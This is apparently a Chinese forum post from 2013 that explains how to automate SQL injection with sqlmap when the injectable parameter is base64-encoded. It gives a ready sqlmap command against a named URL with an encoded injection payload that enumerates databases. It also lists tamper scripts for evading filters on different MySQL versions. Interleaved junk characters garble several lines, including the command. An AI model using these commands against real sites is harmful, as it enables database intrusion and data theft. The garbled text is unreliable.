WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
5 L# w* z* `) j' H: I `" U; o, }/ c o; p3 x: p
sqlmap的tamper里有个base64encode.py
! x" T+ M. ^' I9 n) a
) }9 }) i- L7 e1 g% A使用如下/ {$ ~8 z: T/ i9 `: G! o3 R5 T' x+ [
/ o# W, w9 [5 X% Z- msqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs7 w1 F) F0 A1 ]
( Z1 q/ A/ r8 O* n# Q' Z7 {! e4 ]$ f
* k/ o5 Z- M) K" s4 }sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
1 b4 H! E- b+ Z; R/ _/ v9 J1 ~$ ?+ J! r
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:8 e2 |/ p: c2 H
& `/ b4 g$ C% o; ?) Ispace2hash.py ,对于MYSQL数据库 4.0, 5.0注入# ~- l# O4 _; I0 B9 x7 k0 J
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
% r) Y6 ~+ Z8 t1 P! ]2 H首先确定目标数据库版本,然后选择相应的脚本。
1 x% z" |3 {5 _* X( \* w) n-v 3 --batch --tamper "space2hash.py"
# F. r! `6 X0 x% T, `, Q
) M$ R+ S0 G+ B: [ C还有其他一些插件:
: o' f; ?7 l' e! ~encodes编码 ——charencode.py& t* E- U6 d' E" X
base64编码 —— base64encode.py) l8 C- w4 _" A) r
替换空格和关键字 —— halfversionedmorekeywords.py
* J* p5 _) @0 c* v; F1 [ |
' J4 o# q5 p! h$ B) p
, N" T; ]7 {2 u9 u Y5 k# z1 m# n
2 K* p; ^/ k! ~3 d1 D0 M
; t6 u' K! Y( ~# Y: P0 c |
发表于 2013-11-23 15:50:45
收藏
支持
反对